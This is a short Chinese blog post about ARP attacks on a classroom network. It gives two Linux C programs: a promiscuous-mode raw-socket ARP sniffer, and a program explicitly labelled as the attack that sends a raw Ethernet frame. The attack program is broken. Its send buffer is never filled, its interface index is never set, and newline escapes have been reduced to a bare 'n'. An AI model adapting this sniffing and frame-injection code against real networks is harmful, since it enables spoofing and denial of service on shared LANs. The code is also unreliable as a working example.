上课的地方arp横行，总是上不去网。
研究了一下arp功击的代码。总用更高的频率来解决功击网关的问题，失败告终。

抓包

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

void print_arp(unsigned char *a,int len)
{
 int i;
 char ccc='1';
 for(i=0;i<len;i++){
  if(i==6 || i==12 || i==14 || i==16 || i==18 || i==19 || i==20 || i==22 || i==28 || i==32 || i==38 || i==42)
   putchar('|');
  if((i>=28 && i<=31) || (i>=38 && i<=41))
   printf("%d.",a[i]);
  else
   printf("%02x",a[i]);
  //fflush(stdout);
 }
 putchar('n');
}
void print_eth(unsigned char *a,int len)
{
 int i;
 for(i=0;i<len;i++){
  printf("%02x",a[i]);
 }
 putchar('n');
}

int set_promisc(char *interface, int fd) {
 struct ifreq ifr;
 strcpy(ifr.ifr_name, interface);
 if(ioctl(fd, SIOCGIFFLAGS, &ifr) == -1) {
  perror("iotcl()");
  return -1;
 }
 ifr.ifr_flags |= IFF_PROMISC;
 if(ioctl(fd, SIOCSIFFLAGS, &ifr) == -1) {
  perror("iotcl()");
  return -1;
 }
 return 0;
}

int main(int argc, char **argv) {
 int sock, n;
 unsigned char buffer[2048];
 unsigned char *iphead, *ethhead;
 struct sockaddr_ll sll;

 // if(argc != 3){
 //  printf("need interface name and protocol as argumentsn");
 //  return -1;
 // }

 if ( (sock=socket(PF_PACKET, SOCK_RAW,
     htons(ETH_P_ARP)))<0) {
  perror("socket");
  exit(1);
 }
 sll.sll_family = PF_PACKET;
 //    sll.sll_ifindex = Get_IfaceIndex(sock,argv[1]); //通过此处传入网络设备接口
 struct ifreq ifstruct;
 strcpy(ifstruct.ifr_name, "eth0");
 //sll.sll_protocol = htons(atoi(argv[2]));
 sll.sll_protocol=htons(ETH_P_ARP);

 if(bind(sock,(struct sockaddr *)(&sll),sizeof(sll))==-1)
 {
  printf("bind error:%s !n",strerror(errno));
  return -1;
 }

 //int set_promisc(char *interface, int fd) {
 if(set_promisc("eth0",sock) == -1)
 {
  printf("BLUE set promisc failed !n");
  return -1;
 }

 while (1) {
  printf("—–recive start—–n");
  n = recvfrom(sock,buffer,2048,0,NULL,NULL);
  printf("%d bytes readn",n);
  printf("index:%dn",sll.sll_ifindex );
  /* Check to see if the packet contains at least
   * complete Ethernet (14), IP (20) and TCP/UDP
   * (8) headers.
   */
  if (n<42) {
   perror("recvfrom():");
   printf("Incomplete packet (errno is %d)n",
     errno);
   close(sock);
   exit(0);
  }

  ethhead = buffer;
  printf("Destination MAC address: "
    "%02x:%02x:%02x:%02x:%02x:%02xn",
    ethhead[0],ethhead[1],ethhead[2],
    ethhead[3],ethhead[4],ethhead[5]);
  printf("Source MAC address: "
    "%02x:%02x:%02x:%02x:%02x:%02xn",
    ethhead[6],ethhead[7],ethhead[8],
    ethhead[9],ethhead[10],ethhead[11]);
  printf("protocal:"
    "0x%02x%02xn",ethhead[12],ethhead[13]);

  iphead = buffer+14; /* Skip Ethernet header */
  if (*iphead==0x45) { /* Double check for IPv4
          * and no options present */
   printf("Source host %d.%d.%d.%dn",
     iphead[12],iphead[13],
     iphead[14],iphead[15]);
   printf("Dest host %d.%d.%d.%dn",
     iphead[16],iphead[17],
     iphead[18],iphead[19]);
   printf("Source,Dest ports %d,%dn",
     (iphead[20]<<8)+iphead[21],
     (iphead[22]<<8)+iphead[23]);
   printf("Layer-4 protocol %dn",iphead[9]);
  }
  //print_eth(1,buffer,512);
  print_arp(ethhead,48);
  //  print_eth(ethhead,n);
 }

}
 

功击

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <string.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

void print_eth(unsigned char *a,int len)
{
 int i;
 for(i=0;i<len;i++){
  printf("%02x",a[i]);
 }
 putchar('n');
}
int set_promisc(char *interface, int fd) {
 struct ifreq ifr;
 strcpy(ifr.ifr_name, interface);
 if(ioctl(fd, SIOCGIFFLAGS, &ifr) == -1) {
  perror("iotcl()");
  return -1;
 }
 ifr.ifr_flags |= IFF_PROMISC;
 if(ioctl(fd, SIOCSIFFLAGS, &ifr) == -1) {
  perror("iotcl()");
  return -1;
 }
 return 0;
}

int main(int argc, char **argv){
 int sock;
 char SendBuffer[64];
 char intfname[16];
 struct sockaddr_ll dest;
 struct sockaddr_ll sll;

 memset(&dest,0,sizeof(dest));
 memset(&sll,0,sizeof(sll));
 strcpy(intfname,argv[1]);
 dest.sll_family=AF_PACKET;
 dest.sll_protocol=htons(ETH_P_ALL);
 if ( (sock=socket(PF_PACKET, SOCK_RAW,
     htons(ETH_P_ALL)))<0) {
  perror("socket");
  exit(1);
 }

 sll.sll_family = AF_PACKET;
 // sll.sll_ifindex = Get_IfaceIndex(sock,intfname);
 struct ifreq ifstruct;
 strcpy(ifstruct.ifr_name, "eth0");
 sll.sll_protocol = htons(ETH_P_ALL);
 dest.sll_ifindex =sll.sll_ifindex;
 dest.sll_halen = 6;
 memcpy((char*)dest.sll_addr,SendBuffer,6);

 if(bind(sock,(struct sockaddr *)(&sll),sizeof(sll))==-1)
 {
  printf("bind error!!n");
  return 0;
 }

 if(set_promisc("eth0",sock) == -1)
 {
  printf("BLUE set promisc failed !n");
  return 0;
 }

 printf("nnnn—-send start——n");
 print_eth(SendBuffer,64);
 sendto(sock,&SendBuffer,64,0,(struct sockaddr *)(&dest),sizeof(dest));
 //printf("send to %x:%x:%x:%x:%x:%xn",dest.sll_addr[0],dest.sll_addr[1],dest.sll_addr[2],dest.sll_addr[3],dest.sll_addr[4],dest.sll_addr[5]);
 printf("—send success—-n");

 return 0;
}
 

原文件下载:

tt2 tt1